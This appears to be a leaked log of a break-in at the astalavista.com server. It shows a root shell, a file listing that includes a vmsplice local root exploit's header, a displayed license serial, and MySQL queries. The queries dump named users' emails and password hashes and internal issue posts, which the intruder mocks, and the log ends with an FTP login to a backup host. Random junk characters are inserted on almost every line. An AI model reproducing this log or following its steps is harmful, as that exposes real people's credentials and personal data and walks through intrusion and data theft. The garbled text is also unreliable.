: i3 Z0 p p7 g( b& u+ J. o, B$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish! V% M6 ?" h0 b9 P6 ?6 X4 r! l
?>
% C/ h( E) A9 T0 s; L% G6 t% X! W# h( o1 N! y6 {( t! V
sh-3.2# cd ..( N, R; L9 |. N4 @, r7 [
sh-3.2# cd com
2 ]$ U& n$ k! Z* N T& q) ^sh-3.2# ls -la
' v# z" M5 K' h1 r% o0 ytotal 141208
5 N$ P, o1 A2 `$ g: V3 l3 sdrwx–x–x 10 com com 4096 Apr 28 12:40 .: Y1 g) e' v7 Q5 g* n% C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( C2 ]2 Z3 y* R2 U% P
drwx—— 2 com com 4096 Jun 4 04:04 backups) l+ F5 b0 p0 v; d+ V0 C
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
. W, L9 i+ C* n6 o+ u) Z9 Idrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system. T" `+ h) q; V g
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
j, y% y/ ]; b8 g) q: q) Y- r-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout @( d% m% i, |+ r
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile4 t M+ u- \; w
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc, v: r: H5 [" n( u; m
drwx–x–x 3 com com 4096 Jan 29 2008 domains
/ ~/ Y% V5 [$ g$ Q/ x' r2 x( }-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
% O, M9 U' x6 Y2 O! `1 Adrwxrwx— 3 com mail 4096 Jan 6 19:24 imap7 h$ }; t5 B. D0 I( I
-rw——- 1 com com 69 Nov 18 2008 .lesshst) D. x4 m P, `0 c& k \$ p( P* E
drwx—— 2 com com 4096 Sep 24 2007 mail
4 F# W# ?% k) ~+ E6 e! R-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
1 v9 e- G: n$ J3 d! T+ z) H; E6 W adrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
]4 f k2 ~3 }. g( j0 x& O- {lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
d2 s7 G, n1 A9 m-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
4 n9 V4 p1 g7 R' c- Q8 a9 l( Y+ ldrwx—— 2 com com 4096 Aug 26 2008 .ssh
8 [" G" [" [; f/ n! I7 ?-rwx—— 1 com com 8515 Feb 10 2008 t( V% C0 o+ B8 k6 Q" ^
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c; v' U( i: U. h# n: T2 v. c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp. A+ r+ N9 V# V0 n; c; j- \ L
-rw-rw-r– 1 com com 617 May 20 2008 .toprc; K: K% I( b7 I% e+ M& x
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql' v* ^0 y" g, [1 q
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo# E$ r( m6 g& X1 m& o* v9 e
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc+ ]7 J, X; s( c- U
V2 k( `0 I) o+ B
sh-3.2# head t.c
! J9 P* l7 o# u( p. A6 p9 d5 t/*
7 D6 `* W* F7 a- b! B0 o c* jessica_biel_naked_in_my_bed.c9 }: [ O5 a. B' |& |2 X
** {3 w9 K: O/ ?4 @) M: P
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.* b& m; s$ G6 r! i
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
9 c4 ^; Y: L3 ~# U! z* Stejnak je to stare jak cyp a aj jakesyk rozbite.% f* e) ~$ i: |% E9 }
*/ }0 p, L1 x& S' }1 ~0 y2 H
* Linux vmsplice Local Root Exploit4 {+ D9 p4 ]' D {9 E+ K
* By qaaz
+ z0 Y; ^9 j% \*
, @, x9 z2 o- J8 B0 h/ C
2 C+ e; K% N% ], y1 Ksh-3.2# cd /4 @) b. w- v( s( q7 M. n% j
sh-3.2# ls -la
/ S4 Y8 V1 d- B {6 P* J5 o. Btotal 3600 p# e, Y$ R3 d0 x2 o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ., u4 t8 T5 l7 x+ B4 u
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .." w7 k1 I4 o( c) ~* U. K
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
" _# O* H9 q4 {/ L! W-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
' h+ H' Q% r3 L-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
5 z2 r( H. E% m7 u-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck# y. |+ k/ B' _$ {8 b0 k0 \2 F. Z& L
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
: h' j1 C7 D( }6 \* B2 Tdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
" X7 p/ E% ~$ g* Y3 C' Jdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
* [3 s Q& c C& C) Zdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot6 r( n2 S" K: E. W1 G% E% z
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev2 o5 W( v" R6 z5 j4 }
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
; Y1 ]5 H" c' I# |9 l+ t! Y. Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
& H+ R5 d! a- Z+ b7 b, ^-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
7 D9 X. n0 g3 k4 P, @% }drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
7 ~; E. i9 s6 v% t* Qdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
A* R: c3 l7 X Ydrwx—— 2 root root 16384 Sep 11 2007 lost+found
5 Z: h2 n8 l0 j8 _drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
& e3 R. Q' k7 H% c. Cdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
' t, H+ @4 B9 ^3 C, ndrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
& ?$ g. _: A# x) s$ U-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg; c; L' B7 E9 j# W+ F0 ^
drwxr-xr-x 2 root root 0 Jun 3 02:43 net4 e9 V4 }7 s0 C, q/ X: h; a, B5 R
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt; w* Y4 j4 L$ V! J6 P k4 o
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc! _8 S( x) V: I4 h
drwxr-x— 15 root root 4096 Jun 4 08:40 root! }- n& l$ i6 c3 [% k
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
# A" w1 j% X) Y/ b+ Q- f% R; Sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux! ^8 ~4 m: Q. }. y6 s; }& ?
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv9 _; F/ k4 \* z& T- l: N
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
# a& H* e, x: K6 R2 o' Q, c+ }drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
9 x# o8 b( {3 \4 ydrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr4 Z; n" i1 t$ S9 {/ }" h) h. E
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 L: k. w! d: N( t0 i# N# d
, ?0 _& S. Y2 {2 ^4 f. Rsh-3.2# cd opt/ \8 ?1 N4 l7 Z6 ^+ n5 ?+ ~
sh-3.2# ls -la* V7 u- p& a! ~. b& w( I; k% e
total 20
- W/ P6 ^ E& {3 e( adrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
( @6 b8 n9 \5 @drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! i" J) b$ \ p+ X- _drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
$ y( ~9 P6 O5 Q! l9 [. P& ~% S W
% {& X r4 m v6 |$ Q; Gsh-3.2# cd lsws/* \* V4 m; E0 M4 d
sh-3.2# ls -la
* z3 X# F0 `8 \, atotal 1089 B ^/ P V7 I/ z* y* j
drwxr-xr-x 15 root root 4096 Mar 20 2008 .- ^: Q, Y5 E8 V% z! l5 _
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..( X' F; t- k5 e
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
7 {) Y$ X* X7 `" Z8 K& sdrwxr-xr-x 13 root root 4096 May 29 15:10 admin [, O o0 }+ q1 R$ U
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
- Y5 K- S5 P! ~+ F- ydrwxr-xr-x 2 root root 4096 May 29 15:10 bin5 Z, B! B' }! m# ~ `
drwx—— 4 apache apache 4096 Jun 3 02:43 conf( B) `4 `1 j9 q3 J! J1 M) n) S8 \
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT. }! I: N) W/ c( E- M- @
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs0 J& ?; g! y; y/ O
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
0 a! t I0 b! d1 ]+ v$ I2 Udrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
, L2 D' b- @1 I2 F-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE# l. C4 W& `% f0 Z8 L Z# J
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP+ c# \1 O" `& p- \6 y2 A
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
+ T1 c; U, J, l' l" |$ W( z& ?" E-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP3 k3 F+ W4 p' F+ S
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs8 c6 P3 x7 i1 x# }' F5 O" k3 k
drwxr-xr-x 2 root root 4096 Mar 20 2008 php, Q" S: R6 \4 Q+ ]
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
! V8 |0 {& c: W! T4 ydrwxr-xr-x 3 root root 4096 Mar 20 2008 share. d8 Q4 y7 O9 Z
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
" o) e7 h+ L) r" i8 p3 V- n7 C0 t S
sh-3.2# cd conf
3 _3 r, l) d8 j$ S. i$ Zsh-3.2# ls -la
- x% R+ G/ V/ b& V+ Ltotal 48. X: r+ n6 T( D" Y
drwx—— 4 apache apache 4096 Jun 3 02:43 .0 t0 ~+ k% d) ^, i
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
3 ]# I$ M* I9 @# x x1 udrwx—— 2 apache apache 4096 Mar 20 2008 cert- b; l4 H! y1 j- R: P" x
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml) d- ~5 L! [( C- v/ s# A
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak8 c9 }: O- Q* Y& }% [0 S8 r
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
- S# k1 p V9 n- j! Q-rw——- 1 apache apache 256 May 29 15:10 license.key
2 e( ]- ^$ C R-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
H$ t+ p c) l5 ^" r6 i-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
! {2 V$ J! J/ [* |-rw——- 1 apache apache 20 May 29 15:10 serial.no' M) b2 @3 y: e: o
drwx—— 2 apache apache 4096 Mar 20 2008 templates
9 H. W$ y: z% v c' ?9 O3 p: k
" I p1 A8 E2 f" D+ k5 Osh-3.2# cat serial.no6 N/ u9 V. B, F& t4 W7 ? r/ B& j
IbDl-oVsO-CKqL-wVRa8 X# u- {7 |' p
1 c5 P, c* W- F0 C
sh-3.2# mysql% C7 d2 R2 f/ _/ P' ?+ I2 j, Y- h; P
Welcome to the MySQL monitor. Commands end with ; or \g.
7 B9 T- e, }% {/ ^/ ^3 Y1 EYour MySQL connection id is 2868441 t, f! |: F: ^* _& C) N5 f# a
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& \& i, h0 B% l2 r3 F; g/ v* _. q+ M' g& ~0 }) z9 y
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 s& S* m% u$ s& L5 g4 q w
* N! b3 e' H$ ~2 z$ T8 \& A
mysql> show databases;2 m2 T; H& i* Z+ {9 T
+———————–+, D4 v' u: Q7 }/ I7 |
| Database |: ^4 Q) v4 x" _% [" R/ s
+———————–+" `! p) i8 s9 x( O
| information_schema |- e- o( s/ p1 z
| astanet_ads |
, Y, j Q4 G4 P1 N" Q| astanet_mailing_lists |; C6 g. f. o4 }! J- q
| astanet_mediawiki |3 I6 A! k( _1 d2 R! x
| astanet_membersystem |3 n. e3 e, I+ \7 y- W
| com_contrexx |/ |5 ]0 Z) @ M4 m; h
| com_contrexx2 |5 X# A4 h: W6 m+ D
| com_contrexx2_live |
; Z1 v* x# f2 \( z9 l" a7 J| da_roundcube |: V/ f& g$ g' l5 l* A/ W+ }
| dolphin |
5 R* z* C. A" d) m| ideapool |6 T& p& n3 o5 A4 V3 X7 X
| mysql |
' U: F5 {: _' a" c5 D5 M. S| test |1 Q, J; h+ Q0 M ]' v. E
| yourmaster |
" x+ [, u8 |! T4 I+———————–+
( ~/ `. }; }. b$ [9 q14 rows in set (0.00 sec)
0 k8 y K4 g1 L$ Z9 ?. U" m0 u: A; @9 x/ _9 H
mysql> use ideapool. M& N/ O2 |8 L$ d+ _
Database changed
1 H: O; \0 o5 h* Z& Fmysql> show tables;
% g; Y$ v+ z0 D8 r3 k- S+———————————–+
- g; i+ ?/ g4 f+ r8 I| Tables_in_ideapool |0 A; X1 ], [6 ?1 t. x" e) E: I8 `6 i9 Q
+———————————–+
) V* G& p' Y5 P( N| eventum_columns_to_display | |! L& R; z9 b; E& s4 w, G8 S
| eventum_custom_field |8 E. b) B9 m& u& k; r
| eventum_custom_field_option |: C! i; Z8 z0 D% Y2 i$ H$ O- R
| eventum_custom_filter |3 E9 w. p6 g9 V# Y* _5 ^
| eventum_customer_account_manager |. O S, l' d2 b6 I; ` C
| eventum_customer_note |( V8 `/ c6 C( e
| eventum_email_account |
7 M# G; ^$ A0 q+ e1 @& |# l| eventum_email_draft |
; S4 y6 k; f5 n/ P2 ^3 S* ]% e| eventum_email_draft_recipient |
- ?6 _) S- s- X9 g0 b0 D| eventum_email_response |( _4 B$ y6 \& I+ l2 F# I7 Q$ H
| eventum_faq |$ v6 ~/ L1 ?( L6 C2 I' r
| eventum_faq_support_level |4 }0 @0 d" h- \, S+ w+ t
| eventum_group |
3 o$ I5 v. r" k; W8 m& S| eventum_history_type |6 \" `7 b9 u0 V
| eventum_irc_notice |7 {1 }* U/ u% }! E2 P) u
| eventum_issue |: C y# d% n, m/ p6 ?; l
| eventum_issue_association |
/ N; P/ E0 v: x8 T% u+ u6 q| eventum_issue_attachment |. I* S, z5 E7 g* d$ T
| eventum_issue_attachment_file |- S O* k9 ~( u$ W
| eventum_issue_checkin |
5 U" Y7 i6 c p3 ]/ g. s| eventum_issue_custom_field |! T$ v8 w4 p, M) b- R5 p$ U' Y$ h
| eventum_issue_history |6 A! V6 B8 `& @. T7 c
| eventum_issue_quarantine |
0 ^: N& B z5 p9 |1 _: u0 `; H| eventum_issue_requirement |
6 E( L3 N9 w% J$ ]- q7 U, V* }| eventum_issue_user |
8 _9 I: d$ B8 C% }8 R| eventum_issue_user_replier |# A6 C* x H. l& A; e
| eventum_link_filter |5 K4 [0 a! G: l
| eventum_mail_queue |
; o( k, F- n3 l; b0 ]! c+ b; m| eventum_mail_queue_log |
# a2 k3 U& a: r, W2 ]% g9 G" t| eventum_news |# X: o) U: l# I4 d& [/ ]. n+ l' P' V+ `& r
| eventum_note |$ t( y" T Q- p
| eventum_phone_support | Z0 [: g8 Q- h E( F' L
| eventum_project |
# S6 i3 _( _" P7 x) [. P| eventum_project_category |
6 r, A: \8 N! r$ o. P! J; ?1 X) u| eventum_project_custom_field |
! T' p4 n/ R9 O' W& `| eventum_project_email_response |
/ y6 \1 T2 h6 N| eventum_project_field_display |, u4 P6 V( a1 l0 T; o
| eventum_project_group |
3 _6 P. `. s. ]: V1 m| eventum_project_link_filter |
$ S, g5 Y9 O& U9 G2 i) m| eventum_project_news |
* a% B$ z/ ?- K/ P# t: f5 v| eventum_project_phone_category |4 J9 s4 W& s" G
| eventum_project_priority |
: M8 N4 ~ e! J| eventum_project_release |
C" ]- D; o, v$ @. H7 Y- g| eventum_project_round_robin |
& y- s0 Y D P, t( U p| eventum_project_status |
; R: @; C4 }- Y! h3 Z| eventum_project_status_date |) F, Z" K' g; b2 B
| eventum_project_user |
1 y( ?8 i8 P. n6 T, D6 X @# u| eventum_reminder_action |8 i5 V' Q' C, T
| eventum_reminder_action_list |
- s9 f3 D8 @5 B. ?| eventum_reminder_action_type | }: n) D* |8 S! d9 m
| eventum_reminder_field |
1 D) F' W! d2 b% @/ P| eventum_reminder_history |% J2 _, W; F; n+ E* s, W* L0 u
| eventum_reminder_level |' [, W4 |. V% v* S9 M5 C
| eventum_reminder_level_condition |: M p& ~. J* j* o9 y# L
| eventum_reminder_operator |/ E. q k& i, T3 J/ w
| eventum_reminder_priority |* c4 a% b! d1 _$ b
| eventum_reminder_requirement |
G4 z8 l3 J1 J3 \| eventum_reminder_triggered_action |
7 v9 L: {- O: A. C6 Z' W8 || eventum_resolution |
$ V# S- m( b( h1 d4 x8 K| eventum_round_robin_user |
' q* @% ]" t! _; M& @; f| eventum_search_profile |
3 u3 e( W$ |* ~4 i& ^; S| eventum_status |
O, Y, _; _, i/ o# W| eventum_subscription |
. ~; E2 z7 \' l$ r# b+ @| eventum_subscription_type |( b w2 k, p4 Z
| eventum_support_email |
* V6 n( j1 d6 s. T6 G# Q9 H| eventum_support_email_body |
; c* O, z! O# L4 O8 b| eventum_time_tracking |
) v: f- L. X) V9 {| eventum_time_tracking_category |
1 X2 K) O2 S. K8 ]3 a+ || eventum_user |$ K( x6 ~$ _ H: G( x/ @
+———————————–+
2 @6 ^0 d/ l/ p" u7 s7 F4 o69 rows in set (0.00 sec)
" i. H$ i9 U! F9 J& e2 n; W7 G+ ^
7 p) V/ q j6 B, I) Y3 Omysql> describe eventum_user;# C0 s/ ~: ?1 B ]# n
+————————-+——————+——+—–+———————+—————-+
5 y3 P; Z ~: v) K* h, U. z| Field | Type | Null | Key | Default | Extra |: E9 i/ H3 }2 A7 u2 e8 J
+————————-+——————+——+—–+———————+—————-+: Y3 O4 d! Q- c% \: x0 g
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |9 L q/ g# S* h: j
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |7 L# X' K; b/ n" r, s2 M( R- @
| usr_customer_id | int(11) unsigned | YES | | NULL | |
- M8 d" K( |$ v0 Y* r- ~| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |1 k0 H" M$ \3 q! h6 W$ G
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |2 h' j/ ~; v4 b
| usr_status | varchar(8) | NO | | active | |' q2 b; ?' H6 v- B, e
| usr_password | varchar(32) | NO | | | |' |, E* r9 a, F) o1 C ]" i6 ~. g
| usr_full_name | varchar(255) | NO | | | |# v+ J; y: h4 m0 A2 i/ U; x" e
| usr_email | varchar(255) | NO | UNI | | |
0 c) q. h7 \$ V; ?; ~! i0 x| usr_preferences | longtext | YES | | NULL | |5 H2 n0 w9 }7 d0 ]7 \! M0 S
| usr_sms_email | varchar(255) | YES | | NULL | |
9 s. H( q8 Y; p( B8 w! s| usr_clocked_in | tinyint(1) | YES | | 0 | |1 b' o4 ^, h. t) e! x; C2 f8 \- L0 Z( u0 a
| usr_lang | varchar(5) | YES | | NULL | |5 [/ i: i. i6 R: G
+————————-+——————+——+—–+———————+—————-+
4 v. u7 |7 W/ v# L8 s13 rows in set (0.00 sec)# T& {/ g: I; t( ^
( @ l( F/ c# b, u
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
6 D1 [: y( s! c4 c/ x+———————-+——————————-+———————————-+ E4 j. U% d4 x4 |) Z
| usr_full_name | usr_email | usr_password |6 G+ `. m+ Y. j: C+ A- X
+———————-+——————————-+———————————-+
' q7 F, Q6 G5 a/ @* D8 b9 C| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
: }* i# E) V$ }" k; a| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
3 m( ^( i0 q! i7 q: ]# c7 W. p| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
7 `! o+ P$ g; t. W0 c) e| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
* R1 c+ V( l$ e0 {" G. v| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |) h) U/ H+ B- M
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
! L! n9 @' |# p8 _/ S) q) [8 S| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
8 o7 I4 a! V- w; l8 v9 ]3 j$ Y2 j| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |; t' p9 U3 |( C4 z. ~* m: O: O
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |. \9 v: ~+ A% P+ {3 B
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
# `/ v/ J! E4 s$ U| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |/ a1 p0 }/ u( e! j6 F- u- Q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
# ~+ ?6 r- I4 V+ y( O5 i' B' D0 m| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |8 y: h% D+ N5 t5 v1 E: x h8 D
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |; W5 z, p7 z9 J1 r! n! j* u
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |4 a" y$ W5 \8 j
+———————-+——————————-+———————————-+" t* J% [& d( t$ n
15 rows in set (0.00 sec)
! x, l: O- l, [' X, J# {8 n- y! z9 W
mysql> select iss_description from eventum_issue where iss_id = 43;7 \' T$ ?" p6 q3 V; T! Y: o q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 ~+ _; D0 n2 A! t6 F, L| iss_description ' v; T/ c, E! K
|
* K3 t& U" a2 i. d( g/ _+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. s$ @/ }+ c3 W2 w| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be, c' C' [& J. k4 v3 u% C; F; G
connected for 90 mins… 120mins… so what i propose is something like:6 X. W3 p3 Z8 k( h- F# j* _
链接标记[url]http://www.surfthechannel.com/[/url]
! j+ W8 Q8 g0 M- S# @/ Esince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
- I6 }. C5 x) \, c9 u( Glike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t5 S# y" i7 f7 s: z7 c/ w5 c
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
& w2 _. x, m) F2 wif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
) ], A* p4 o* q* c. V" A* T3 r5 o( _! }) J" p1 @. O3 I# \) l0 e$ }
We could also put advertisement during play on the flash video player itself… extra $$…
, a& @. y- j4 j! [- y9 y
+ D# \9 h. y+ `% M2 NBy sykadul |: }4 k; R$ M$ S# u% x
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' v0 v6 ]" `- W/ p, Y+ z1 row in set (0.00 sec)
' t3 b+ U2 t- Z' U; D* V& o8 D& }0 ]0 {$ z1 b1 I- v5 C
// Money and extra $$ is all they care about. remember that./ z( k" ?0 {7 W
& i6 [* x) g. Y8 b, q/ U% Fmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
( d/ f( m% N8 t" N& Y+————————+——————————————————————————————————————————————————————————————————————————————-+5 T* {4 _) M' @- j1 N& ~3 K
| iss_summary | iss_description 7 H* E: k; f# V" D ]
|
U( B8 O$ ]7 O. U+————————+——————————————————————————————————————————————————————————————————————————————-+
; J! i, V% ?0 `5 i; b* E8 E| Forum for REAL EXPERTS | Hello,
9 P+ H. l9 I9 O3 @ `% N# R# O8 q7 W' q# T( u; M+ i$ x
Ishtus and I,. e( m4 |/ Z, _1 }+ v, G, M
* }" u1 \2 `; p
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
# j* O2 p+ e% A, D% L7 t2 ~* w, r. \1 y" SONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..1 R* x! W5 S4 h% w
* S4 |7 T; G4 c6 G
One example a friend of mine from coresecurity.com!
- H5 {2 X o1 A+ H+ w; m- w$ ]5 R4 I7 p3 ^, |
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..* J1 ?1 X9 O, |1 f
: P) s8 ~* q' Z- P* p# |
|
) X* h. P1 v- b, g5 W+————————+——————————————————————————————————————————————————————————————————————————————+
+ i" b2 Y5 P) [, R+ a. c7 Q) P( n1 row in set (0.00 sec)* `+ k' z& _& ]7 [! g# u, y
p" o: U) d+ d5 q: Y// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
' f/ x/ U, O) O" D9 o4 ^; g
7 w: Q, w" E" Qmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
9 r! H( }) ?8 j8 z, M% o* a0 W+——————+———————————————————————————————+: i8 c% i" f) A l
| iss_summary | iss_description |2 H/ g. A" G2 B( [/ t
+——————+———————————————————————————————+) p& O0 }* }6 S V: T- ]( w
| Website guidance | Virtual Girl which guides you trought the website./ L7 m7 {& X& g0 x$ D+ ?
6 n5 j9 M& {+ L& BWe need a girl with who you can ( talk )!!!7 G3 v( I+ U2 Y* J( [
Also for the News!
. P! [6 I* {& ~$ [So my suggestion is a girl who read you the news loud if you like!4 u3 u' k; z5 Q2 N
you can choose between read yourselfe or she read it for you or both!& X( ~0 w& w5 M3 s6 e6 @
2 G- L/ q- H/ g4 I" R8 e4 X% `- t
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!/ ^$ O/ e! E t2 ^
3 z8 ]# P; U: t+ z9 {Have a look on the example girls!!) v* O& T0 u9 x0 k/ Z/ y
# `, p2 e9 [1 k. l' @
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]8 }" r: `' x$ W) I
T) ]6 S% \# M2 c& Eor that
' m7 f, F/ ~. [. N3 c1 s Z2 T
9 b1 b4 O8 M/ W9 o/ Z0 a链接标记[url]http://www.yellostrom.de/[/url]
7 s/ {6 m* q# c9 P2 n2 S. l. E& U$ V' M! q
|
% ?1 C+ ~) _5 R2 v: s+——————+———————————————————————————————+; `. W9 ^: D% n. G& G
1 row in set (0.00 sec)
# G5 @0 \" r5 x( {
% a" V. l- N, l+ P. d# T/ B// ha ha.
) q5 `( ?$ w/ T2 s* K6 X" `' h# k# ?+ E
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;" ^" X3 M& `* j- S; L
+————————–+———————————————————————————————————–+' C3 o5 N" ^+ x" W" \" ?
| iss_summary | iss_description |
6 ^0 h1 L( _4 s( j/ j+————————–+———————————————————————————————————–+
3 n* l0 N# V0 {2 F& Z( C- ~| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
& I+ s0 C& m! m P0 k& y# |+————————–+———————————————————————————————————–+ A0 k. X7 u3 Q
1 row in set (0.00 sec)% d0 Q+ \. j* t/ C' A
7 D0 x% g) u! y5 S0 b0 W1 P1 K) M
// LOL.( i: v" ~; e9 ?5 m& R
6 u0 r+ Y# m6 @/ zmysql> exit& E' h0 T6 m2 P! m
Bye7 e, b% d5 }2 u) R- K
2 Y: ^) J2 i6 m& |sh-3.2# ftp 212.254.194.163/ e& n; ?- f6 m% X6 n. e$ b# x
Connected to 212.254.194.163.
( f7 h! m, i% B7 i220 BackupCOM_VW FTP server ready.
( l: x3 [: Y* V: O$ h% H504 AUTH: security mechanism ‘GSSAPI’ not supported.
, o0 I( m# p& K) G) b: E/ h, M504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
- J4 N0 r! r- I# B) Y& oKERBEROS_V4 rejected as an authentication type1 M, D( m* j7 E3 r
Name (212.254.194.163:root): astalavista.com
8 `4 {( Q+ z, \1 e% ^9 m331 Password required for astalavista.com.
6 Y* k+ F: m* d% D2 X/ \7 cPassword:
: f3 c. o9 u- o230 User astalavista.com logged in.9 R6 g7 u4 g( o! O
Remote system type is UNIX./ k5 S3 T, Q8 R5 W3 u9 Q: \3 m+ n. Y' v
Using binary mode to transfer files.
4 g! }* n% }* Y) C% {ftp> ls -la
2 _' H p0 K. _# O227 Entering Passive Mode (212,254,194,163,2,188)
& {% l2 J& e* u8 n; X; m150 Opening BINARY mode data connection for ‘file list’.
7 u, \6 m0 w adr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
( p u6 W6 ^ q! u- N* ?226 Transfer complete.% p* \! G7 ]( m( S( H q
ftp> cd astalavista.com
